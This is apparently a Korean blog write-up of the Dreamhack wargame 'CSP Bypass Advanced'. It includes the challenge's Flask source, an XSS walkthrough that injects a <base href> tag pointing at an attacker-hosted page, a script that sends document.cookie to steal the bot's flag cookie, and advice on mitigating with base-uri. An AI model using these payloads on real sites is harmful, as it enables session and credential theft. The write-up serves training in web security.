[Dreamhack] Level3: CSP Bypass Advanced

🛎️Access

Exercise: CSP Bypass의 패치된 문제이다.

👾Exploit Algorithm & Payload

#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
import urllib
import os

app = Flask(__name__)
app.secret_key = os.urandom(32)
nonce = os.urandom(16).hex()

try:
    FLAG = open("./flag.txt", "r").read()
except:
    FLAG = "[**FLAG**]"


def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    try:
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome("/chromedriver", options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get("http://127.0.0.1:8000/")
        driver.add_cookie(cookie)
        driver.get(url)
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True


def check_xss(param, cookie={"name": "name", "value": "value"}):
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
    return read_url(url, cookie)

@app.after_request
def add_header(response):
    global nonce
    response.headers['Content-Security-Policy'] = f"default-src 'self'; img-src https://dreamhack.io; style-src 'self' 'unsafe-inline'; script-src 'self' 'nonce-{nonce}'; object-src 'none'"
    nonce = os.urandom(16).hex()
    return response

@app.route("/")
def index():
    return render_template("index.html", nonce=nonce)


@app.route("/vuln")
def vuln():
    param = request.args.get("param", "")
    return render_template("vuln.html", param=param, nonce=nonce)


@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html", nonce=nonce)
    elif request.method == "POST":
        param = request.form.get("param")
        if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
            return f'<script nonce={nonce}>alert("wrong??");history.go(-1);</script>'

        return f'<script nonce={nonce}>alert("good");history.go(-1);</script>'


memo_text = ""


@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\n"
    return render_template("memo.html", memo=memo_text, nonce=nonce)


app.run(host="0.0.0.0", port=8000)

#1

: '/' 기본 페이지

: '/vuln' 페이지에는 입력한 파라미터의 값이 화면에 출력됨을 확인할 수 있다. (/vuln?param=)

http://host3.dreamhack.games:12309/vuln?param=<img src=https://dreamhack.io/assets/img/logo.0a8aabe.svg>

: '/memo' 페이지에는 입력한 파라미터의 값이 화면에 출력됨을 확인할 수 있다. (/memo?memo=)

: 단, 그대로 화면이 출력됨을 알 수 있다.

http://host3.dreamhack.games:12309/memo?memo=hello

: '/flag' 페이지에는 전달된 URL에 임의 이용자가 접속할 수 있게 되어있다.
(해당 이용자의 쿠키에서 flag 획득이 가능할 것으로 보임)

#2

http://host3.dreamhack.games:12309/vuln?param=<script>alert(document.cookie);</script>

: '/vuln' 페이지에서 script문을 사용하여 F12 [개발자 도구]로 반응을 확인하였더니 다음과 같다.

: CSP가 적용된 것을 확인할 수 있다.

> script-src 'self' 'nonce-{nonce}’

: 스크립트 태그 관련 권한과 출처를 제어, 페이지의 현재 출처 내에서 로드하는 리소스만 허용, nonce 속성을 설정하여 예외적 인라인 코드 사용 가능

> 'unsafe-inline’

:예외적으로 인라인 코드의 사용 허용

: 따라서 스크립트문을 인라인 형태로 적용하여 작성하고자 시도했다.

#3

http://host3.dreamhack.games:12309/vuln?param=<script src = 'vuln?param=alert(document.cookie);'><script>

: ‘<’(꺽쇠) token이 먹히지 않는 것을 확인 할 수 있다.

: 구조는 다음과 같다.

@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
return render_template("vuln.html", param=param, nonce=nonce)

: 문제 코드 해석 부분을 살피면 vuln.html을 렌더링해서 리턴하는 것을 알 수 있는데, 여기서 base-uri 'none' (base 태그 URI 제한) 정책이 없다는 것을 확인할 수 있다.

: 따라서 상대 경로를 사용하는 URL들이 본래 의도한 위치가 아닌 공격자의 서버에 자원을 가리키게 되어 공격자는 이를 통해 임의의 스크립트 등을 삽입할 수 있게 됨

----------------------------------------------------------

| base태그: 랜더링 부분(문서)의 경로를 원하는 곳으로 지정하여 스크립트를 삽입할 수 있음

#4

// 공격자의 서버에 자원을 가리키게 되는 위치라 가정
https://gituseryun.github.io/Dremhack_Exploit/csp_bypass_advanced.html

http://host3.dreamhack.games:12309/vuln?param=<base href="https://gituseryun.github.io/Dremhack_Exploit/csp_bypass_advanced.html">

: 따라서 개인 서버에 접근할 수 있는 웹 사이트를 올리고 반응을 확인했다.

: 다음과 같이 작성한 공격자 서버 자원을 가르키는 것을 확인할 수 있다.

: 이것을 이용하면 '/memo' 페이지에서 공격자의 서버 결과를 출력할 수 있겠다 판단됐다.

#5

// 현재 상대경로
/static/js/jquery.min.js
/static/js/bootstrap.min.js

// exploit code
location.href = "http://127.0.0.1:8000/memo?memo="+document.cookie

: 상대 경로임을 확인했던 곳의 위치의 폴더를 생성하고 쿠키값을 알아내기 위한 익스플로잇 코드를 작성했다.

<base href=”https://gituseryun.github.io/static/js/jquery.min.js”>

🔑Analysis and results for obtaining the Flag DH{…}

📌Summary

컨텐츠 보안 정책(CSP; Content Wecurity Policy)은 XSS 공격으로부터 피해를 최소화할 수 있는 좋은 방안이나 XSS 공격을 완전 무력화 하는 수단은 아니기 때문에 잘못 사용 및 우회가 허용될 시 보안 해결책으로써 역할이 불가하게 됨

- CSP(Content Security Policy, 컨텐츠 보안 정책)관련 자료

> https://yun-2.tistory.com/entry/CSP-Bypass

- base-uri 미지정

: HTML 하이퍼링크에서 호스트 주소 없이 경로를 지정하면 브라우저는 현재 문서를 기준으로 주소를 해석

: 공격자가 '<base href="">'와 같은 마크업을 삽입하게 된다면, 추후 상대 경로를 사용하는 URL들은 본래 의도한 위치가 아닌 공격자의 서버에 자원을 가리키게 되어 공격자는 이를 통해 임의의 스크립트 등을 삽입할 수 있게 됨

// base 태그의 URL 제한
base-uri 'none’

// base 태그를 이용한 임의 자원 업로드 (base-uri CSP 구문이 지정되지 않은 경우)
// jquery.js는 base 태그에 의해 해당 URL을 가리킴
<base href="">
<script src="/jquery.js" nonce=NONCE>

- 대응방안 -

- 정확한 CSP 설정

- 'base-uri 지정'

- 정책 강화
(가능한 경우 'default-src'로 설정 후, 필요한 스크립트나 스타일 시트에 대해서만 'script-src', 'style-src'등을 지정하는 방법이 강력)

...

'[Dreamhack]WebHacking > 로드맵_ClientSide' 카테고리의 다른 글

[Dreamhack] Level2: CSP Bypass (0)	2023.11.18
[Dreamhack] Level3: XSS Filtering Bypass Advanced (0)	2023.09.02
[Dreamhack] Level1: XSS Filtering Bypass (0)	2023.08.28

Yun2

[Dreamhack] Level3: CSP Bypass Advanced

🛎️Access

👾Exploit Algorithm & Payload

#1

#2

#3

#4

#5

🔑Analysis and results for obtaining the Flag DH{…}

📌Summary

'[Dreamhack]WebHacking > 로드맵_ClientSide' 카테고리의 다른 글

티스토리툴바

[Dreamhack] Level3: CSP Bypass Advanced

🛎️Access

👾Exploit Algorithm & Payload

#1

#2

#3

#4

#5

🔑Analysis and results for obtaining the Flag DH{…}

📌Summary

'[Dreamhack]WebHacking > 로드맵_ClientSide' 카테고리의 다른 글

관련글

티스토리툴바